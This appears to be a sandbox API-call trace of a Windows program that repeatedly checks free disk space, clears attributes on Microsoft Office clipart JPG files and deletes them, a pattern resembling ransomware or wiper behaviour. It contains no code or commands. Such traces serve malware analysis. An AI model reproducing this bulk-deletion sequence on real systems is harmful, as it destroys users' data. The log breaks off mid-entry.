[0066.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0066.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG", dwFileAttributes=0x80) returned 1 [0066.987] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg")) returned 1 [0066.991] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0066.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG", dwFileAttributes=0x80) returned 1 [0066.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg")) returned 1 [0066.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG", dwFileAttributes=0x80) returned 1 [0067.004] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg")) returned 1 [0067.007] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG", dwFileAttributes=0x80) returned 1 [0067.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg")) returned 1 [0067.019] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG", dwFileAttributes=0x80) returned 1 [0067.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg")) returned 1 [0067.028] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG", dwFileAttributes=0x80) returned 1 [0067.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg")) returned 1 [0067.037] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG", dwFileAttributes=0x80) returned 1 [0067.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg")) returned 1 [0067.045] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG", dwFileAttributes=0x80) returned 1 [0067.052] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg")) returned 1 [0067.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG", dwFileAttributes=0x80) returned 1 [0067.065] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg")) returned 1 [0067.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG", dwFileAttributes=0x80) returned 1 [0067.081] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg")) returned 1 [0067.084] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG", dwFileAttributes=0x80) returned 1 [0067.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg")) returned 1 [0067.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG", dwFileAttributes=0x80) returned 1 [0067.103] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg")) returned 1 [0067.107] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.111] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG", dwFileAttributes=0x80) returned 1 [0067.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg")) returned 1 [0067.115] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG", dwFileAttributes=0x80) returned 1 [0067.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg")) returned 1 [0067.123] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG", dwFileAttributes=0x80) returned 1 [0067.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099187.jpg")) returned 1 [0067.132] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG", dwFileAttributes=0x80) returned 1 [0067.136] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg")) returned 1 [0067.139] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG", dwFileAttributes=0x80) returned 1 [0067.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg")) returned 1 [0067.149] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG", dwFileAttributes=0x80) returned 1 [0067.156] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg")) returned 1 [0067.159] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG", dwFileAttributes=0x80) returned 1 [0067.167] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg")) returned 1 [0067.176] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG", dwFileAttributes=0x80) returned 1 [0067.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg")) returned 1 [0067.186] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG", dwFileAttributes=0x80) returned 1 [0067.192] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg")) returned 1 [0067.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG", dwFileAttributes=0x80) returned 1 [0067.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg")) returned 1 [0067.206] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG", dwFileAttributes=0x80) returned 1 [0067.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg")) returned 1 [0067.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG", dwFileAttributes=0x80) returned 1 [0067.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg")) returned 1 [0067.226] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG", dwFileAttributes=0x80) returned 1 [0067.231] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg")) returned 1 [0067.234] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG", dwFileAttributes=0x80) returned 1 [0067.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg")) returned 1 [0067.243] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG", dwFileAttributes=0x80) returned 1 [0067.250] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg")) returned 1 [0067.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG", dwFileAttributes=0x80) returned 1 [0067.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg")) returned 1 [0067.266] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG", dwFileAttributes=0x80) returned 1 [0067.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg")) returned 1 [0067.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG", dwFileAttributes=0x80) returned 1 [0067.291] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg")) returned 1 [0067.294] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG", dwFileAttributes=0x80) returned 1 [0067.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg")) returned 1 [0067.304] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG", dwFileAttributes=0x80) returned 1 [0067.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg")) returned 1 [0067.315] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG", dwFileAttributes=0x80) returned 1 [0067.323] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg")) returned 1 [0067.325] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG", dwFileAttributes=0x80) returned 1 [0067.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg")) returned 1 [0067.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.343] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG", dwFileAttributes=0x80) returned 1 [0067.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg")) returned 1 [0067.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG", dwFileAttributes=0x80) returned 1 [0067.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg")) returned 1 [0067.356] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG", dwFileAttributes=0x80) returned 1 [0067.364] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg")) returned 1 [0067.446] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG", dwFileAttributes=0x80) returned 1 [0067.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg")) returned 1 [0067.462] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG", dwFileAttributes=0x80) returned 1 [0067.469] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg")) returned 1 [0067.471] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, 